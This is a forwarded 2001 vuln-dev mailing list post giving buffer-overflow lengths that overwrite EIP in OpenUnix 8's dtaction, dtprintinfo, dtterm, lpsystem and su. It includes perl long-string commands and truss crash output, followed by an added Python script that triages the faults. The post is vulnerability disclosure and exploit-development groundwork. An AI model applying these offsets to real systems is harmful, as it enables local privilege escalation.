Fwd: Returned post -- OpenUnix 8 lpsystem , su and DT overflows lengths to eip
From: dotslash@snosoft.com
Date: 10/27/01
Date: Fri, 26 Oct 2001 15:43:34 -0700
Subject: Fwd: Returned post -- OpenUnix 8 lpsystem , su and DT overflows lengths to eip
From: dotslash@snosoft.com
To: vuln-dev@security-focus.com
Message-Id: <E33149F6-CA62-11D5-AEED-00039305969A@snosoft.com>

>> Sorry if this has already made it to this list... I have been getting
>> lots of listserv replies; it doesn't seem to like my mail client.
>>
>> I have had several people ask for the exact lengths on the OpenUnix 8
>> DT overflows; below is some debugging information
>> to help out. (Davor, sorry I sent this to a list... but for some reason
>> I can't mail you)
>>
>> -KF
>>
>>
>> # HOME=`perl -e 'print "A" x 1036'`
>> # export HOME
>> # truss dtaction a
>> Segmentation Fault
>> Incurred fault #6, FLTBOUNDS %pc = 0x41414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> *** process killed ***
>>
>> # HOME=`perl -e 'print "A" x 1035'`
>> # export HOME
>> # truss dtaction a
>> Segmentation Fault
>> Incurred fault #6, FLTBOUNDS %pc = 0x00414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> *** process killed ***
>> -------------------------------------------------------------------------------------------------
>> # HOME=`perl -e 'print "A" x 1036'`
>> # export HOME
>> # truss dtprintinfo
>> Segmentation Fault
>> Incurred fault #6, FLTBOUNDS %pc = 0x41414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> *** process killed ***
>>
>> # HOME=`perl -e 'print "A" x 1035'`
>> # export HOME
>> # truss dtprintinfo
>> Incurred fault #6, FLTBOUNDS %pc = 0x00414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> *** process killed ***
>>
>> ------------------------------------------------------------------------------------------------
>>
>> # HOME=`perl -e 'print "A" x 1035'`
>> # export HOME
>> # truss dtterm
>> Segmentation Fault
>> Incurred fault #6, FLTBOUNDS %pc = 0x00414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> *** process killed ***
>>
>> # HOME=`perl -e 'print "A" x 1036'`
>> # export HOME
>> Incurred fault #6, FLTBOUNDS %pc = 0x41414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> *** process killed ***
>> ------------------------------------------------------------------------------------------------
>>
>> # truss lpsystem `perl -e 'print "A" x 2190'`
>> Incurred fault #6, FLTBOUNDS %pc = 0x08077B40
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00004141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00004141
>> *** process killed ***
>>
>> # truss lpsystem `perl -e 'print "A" x 2192'`
>> Incurred fault #6, FLTBOUNDS %pc = 0x08077B40
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
>> *** process killed ***
>>
>> --------------------------------------------------------------------------------------------------
>> # TERM=`perl -e 'print "A" x 1632'`
>> # export TERM
>> # truss /bin/su -
>> Incurred fault #6, FLTBOUNDS %pc = 0x00414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> Received signal #11, SIGSEGV [default]
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141
>> *** process killed ***
>>
>> -------------------------------------------------------------------------------------------------
>> (no eip hit here)
>> # TERM=`perl -e 'print "A" x 1264'`
>> # export TERM
>> # /sbin/su -
>> # exit
>> # TERM=`perl -e 'print "A" x 1265'`
>> # export TERM
>> # /sbin/su -
>> Segmentation Fault - core dumped
>>
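
A crash-triage sketch for the truss output quoted above, added here as an example and not part of the original message: it classifies each fault by how many low-order bytes of %pc match the 0x41 fill and, when %pc is intact, by whether the faulting address does. The function names are hypothetical; the sample lines are copied from the message.

```python
import re

# Patterns for the two truss lines that carry the fault details.
FAULT_RE = re.compile(r"Incurred fault #\d+, \w+\s+%pc = 0x([0-9A-Fa-f]{8})")
ADDR_RE = re.compile(r"siginfo: \w+ \w+ addr=0x([0-9A-Fa-f]{8})")

def pattern_bytes(value, fill=0x41):
    """Count consecutive low-order bytes equal to the fill byte.

    On little-endian x86 the low byte of a stored word is overwritten
    first, so this is the number of bytes the overrun reached.
    """
    count = 0
    for i in range(4):
        if (value >> (8 * i)) & 0xFF != fill:
            break
        count += 1
    return count

def triage(log, fill=0x41):
    """Return (verdict, pc, addr) for one truss crash excerpt."""
    pc = addr = None
    for line in log.splitlines():
        line = line.lstrip("> ")          # tolerate mail quoting
        m = FAULT_RE.search(line)
        if m and pc is None:
            pc = int(m.group(1), 16)
        m = ADDR_RE.search(line)
        if m and addr is None:
            addr = int(m.group(1), 16)
    if pc is None:
        return ("no-fault", pc, addr)
    reached = pattern_bytes(pc, fill)
    if reached == 4:
        return ("pc-fully-overwritten", pc, addr)
    if reached > 0:
        return ("pc-partially-overwritten", pc, addr)
    if addr is not None and pattern_bytes(addr, fill) > 0:
        return ("pc-intact-fault-address-from-input", pc, addr)
    return ("fault-unrelated-to-fill", pc, addr)

# Excerpts copied from the message above.
DTACTION_1036 = """>> Incurred fault #6, FLTBOUNDS %pc = 0x41414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141"""
DTACTION_1035 = """>> Incurred fault #6, FLTBOUNDS %pc = 0x00414141
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00414141"""
LPSYSTEM_2190 = """>> Incurred fault #6, FLTBOUNDS %pc = 0x08077B40
>> siginfo: SIGSEGV SEGV_MAPERR addr=0x00004141"""

if __name__ == "__main__":
    for name in ("DTACTION_1036", "DTACTION_1035", "LPSYSTEM_2190"):
        print(name, triage(globals()[name])[0])
```

On these excerpts the dtaction runs fault with %pc itself taken from the fill bytes, while the lpsystem run faults at a normal %pc (0x08077B40) on an address built from the fill, so the two logs show different kinds of corruption.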